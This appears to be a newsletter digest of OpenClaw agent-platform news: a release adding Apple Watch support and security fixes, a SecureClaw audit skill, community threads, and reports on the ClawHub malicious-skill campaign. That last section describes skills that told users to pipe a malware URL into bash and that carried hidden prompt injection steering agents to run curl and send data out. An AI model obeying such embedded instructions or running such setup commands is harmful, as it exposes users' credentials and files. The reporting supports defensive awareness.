v2026.2.19 Brings Apple Watch, SecureClaw Debuts, ClawHub's 1,184 Malware Skills Dissected

🦞 OpenClaw Updates

v2026.2.19: Apple Watch Companion, APNs Wake, and Security Hardening

Just two days after v2026.2.17's landmark Sonnet 4.6 and million-token context drops, OpenClaw shipped v2026.2.19 — a release that expands the platform's hardware reach to your wrist while aggressively hardening its security posture. The headline feature is an Apple Watch companion MVP that brings a watch inbox UI, notification relay handling, and gateway command surfaces for checking status and sending messages directly from watchOS. Your AI agent is now literally one wrist-raise away.

The Watch integration is backed by a deeper iOS infrastructure overhaul. APNs (Apple Push Notification service) wake now activates disconnected iOS nodes before nodes.invoke calls, and gateway sessions auto-reconnect on silent push wake — dramatically reducing invoke failures when the iOS app is backgrounded. This is the kind of reliability engineering that separates a toy from a tool: your agent can now reliably reach your phone even when the app isn't in the foreground, which was previously a frustrating gap for users relying on OpenClaw's node pairing for iOS automation.

On the security front, v2026.2.19 introduces several meaningful improvements. ACP (Agent Control Protocol) now supports --token-file and --password-file for secret management, with inline secret flag warnings to catch accidental credential exposure in command lines. Working-directory prefixes are redacted to home-relative paths (~) in ACP outputs to prevent path disclosure. Exec script preflight inspection is now constrained to the effective workdir boundary, and security-audit warnings fire when tools.exec.host="sandbox" is configured while sandbox mode is off — catching a dangerous misconfiguration where users think they have sandboxing but don't.

The release also adds gateway.http.no_auth security audit findings that flag when gateway.auth.mode="none" leaves gateway HTTP APIs reachable, with severity levels ranging from warning (loopback-only) to critical (remote exposure). Gateway auth now defaults to token mode with auto-generation of gateway.auth.token at startup — a subtle but critical change that means fresh installations are secure by default rather than open by default.

Other notable fixes include: Telegram channel_post and message now share the same dedupe/access/media pipeline; cron and heartbeat delivery properly honors Telegram topic targets; the TMPDIR is forwarded into macOS LaunchAgent service environments (fixing SQLite CANTOPEN errors for daemon-mode users); and billing error messages now include the specific model name that triggered the error.

Sources: GitHub Release Notes, YouTube: "OpenClaw's BIGGEST Update Yet"

Skills Hardening: No More Shell Injection in Coding Agent

Buried in the v2026.2.19 changelog is a small but telling fix: the coding-agent skill guidance was hardened by removing shell-command examples that interpolated untrusted issue text directly into command strings. This is exactly the kind of subtle vulnerability that the ClawHub supply chain attackers have been exploiting — skills that teach agents to pass user input directly into shell commands without sanitization. The fact that this was in an official, first-party skill underscores how pervasive the problem is. If OpenClaw's own skills had injection-prone patterns, imagine what's lurking in the 3,498 community skills on ClawHub.

Source: GitHub Release Notes

🔒 Security Tip of the Day

⭐ Skill of the Day: SecureClaw

# Clone the repository
git clone https://github.com/anthropics/secureclaw.git

# Run the audit
cd secureclaw && python3 secureclaw_audit.py

# Install as an OpenClaw skill
cp secureclaw_skill/SKILL.md ~/.openclaw/skills/secureclaw/

👥 Community Highlights

r/AI_Agents: "OpenClaw Is Wildly Overrated IMO"

The honeymoon phase is officially over. A post titled "OpenClaw is wildly overrated IMO" generated heated discussion on r/AI_Agents this week. The original poster argued that OpenClaw's capabilities are impressive but its security model is fundamentally broken, its skill ecosystem is a minefield, and the hype has outpaced the product's maturity for mainstream use.

The responses were nuanced. Several experienced developers agreed that OpenClaw is "not ready for non-technical users" and that the ClawHub situation is inexcusable for a project with 190K+ GitHub stars. Others pushed back, arguing that OpenClaw is doing exactly what open-source software is supposed to do — move fast, break things, and let the community fill the gaps. The thread surfaced a legitimate tension in the project's identity: is OpenClaw a developer tool that happens to have mainstream appeal, or a mainstream product that needs developer-grade security?

Notably, several commenters referenced the "Finally setting up OpenClaw safely and securely" guide posted the same day — a comprehensive walkthrough that treats security as a prerequisite rather than an afterthought. The community is self-correcting in real time.

Source: r/AI_Agents

r/AI_Agents: "OpenAI Just Hired the OpenClaw Creator"

The Steinberger-to-OpenAI news continued generating discussion on Reddit, with a thread on r/AI_Agents exploring what the hire means for OpenClaw's future independence. The consensus concern: will OpenAI's involvement eventually steer OpenClaw toward favoring OpenAI models, or will the foundation structure genuinely preserve model-agnostic neutrality? Several commenters pointed to the v2026.2.17 release — which added Anthropic Sonnet 4.6 support — as evidence that model neutrality is alive and well, at least for now.

The thread also surfaced an interesting data point: one commenter claimed to work at a Fortune 500 company that has "quietly deployed OpenClaw for three internal teams" and is watching the foundation transition closely before expanding. Enterprise adoption is happening in the shadows, and the governance question isn't academic — it's a procurement blocker.

Source: r/AI_Agents

Valletta Software: Enterprise Architecture Deep Dive

Valletta Software published a comprehensive OpenClaw 2026 guide covering architecture, setup, and skills security. The piece is aimed at enterprise architects evaluating OpenClaw for production deployment and provides the most detailed public breakdown of OpenClaw's internal architecture — from gateway daemon to agent session management to the skill loading pipeline. Their key finding: "Anyone with a GitHub account older than one week can publish [to ClawHub]. The low barrier has made it a target for supply chain attacks."

Source: Valletta Software

🌐 Ecosystem News

Awesome Agents: The Definitive ClawHub Supply Chain Autopsy

Awesome Agents published what may be the most comprehensive breakdown of the ClawHub malware campaign to date, titled "The #1 Skill on OpenClaw's Marketplace Was Malware." The numbers are staggering:

• 1,184 malicious skills identified across the ClawHub registry
• One attacker uploaded 677 packages — 57% of all malicious listings came from a single account
• 12 publisher accounts linked to the campaign
• 36.8% of all ClawHub skills had at least one security flaw
• 135,000+ exposed OpenClaw instances across 82 countries

The attack vector was devastatingly simple: skills with professional-looking documentation included "Prerequisites" sections telling users to run setup commands like curl -sL [malware URL] | bash. On macOS, this downloaded Atomic Stealer (AMOS) — a malware-as-a-service tool that grabs browser passwords, cryptocurrency wallets, SSH keys, Telegram sessions, macOS Keychain credentials, and every API key in your .env files. On Windows, attackers distributed password-protected ZIP files to evade antivirus scanning.

Perhaps most alarming: 91% of malicious skills also included prompt injection. They didn't just attack the human — they attacked the AI agent itself, embedding hidden instructions that manipulated the agent into silently executing curl commands and sending data to external servers. The agent became the attack vector, bypassing safety guidelines from within the skill's own instructions.

"The most popular skill on OpenClaw's plugin marketplace was functionally malware. It had 9 security vulnerabilities, two of them critical. It silently exfiltrated user data and used prompt injection to bypass safety guidelines. It was downloaded thousands of times. And its ranking was faked."

— Awesome Agents, February 20, 2026

Source: Awesome Agents

SecurityWeek: "OpenClaw Security Issues Continue"

SecurityWeek published a thorough assessment of OpenClaw's security trajectory, noting that while the project "cannot be criticized over recent attempts to improve its security" — having patched CVE-2026-25157 and CVE-2026-25253 in January — the fundamental challenges remain structural. The piece profiles SecureClaw's launch as evidence that the security community has moved from warning about problems to building solutions, with Adversa AI's Alex Polyakov having "given up on hoping that repeated advisories and warnings might solve the OpenClaw security problems" and instead shipping code.

The article provides useful historical context: the Conscia analysis documents the full CVE timeline, noting that CVE-2026-25253 (CVSS 8.8) was "a one-click RCE chain exploitable even against localhost-bound instances" — meaning that even users who thought they were safe by binding to localhost were vulnerable. The patch in v2026.1.29 addressed this, but the window of exposure during OpenClaw's peak adoption period means many installations may still be running vulnerable versions.

Sources: SecurityWeek, Conscia

CyberPress: ClawHavoc Count Rises to 1,184

CyberPress updated the ClawHavoc numbers, reporting that the malicious skill count has risen to 1,184 across the full registry, with ClawHub shrinking to 3,498 skills post-cleanup. However, remnants persist — they identified a single publisher account (moonshine-100rze) with 60 packages and 14,285 downloads still accessible. The cleanup is ongoing, but the whack-a-mole nature of the problem suggests that ClawHub's open publishing model needs fundamental restructuring, not just reactive scanning.

Source: CyberPress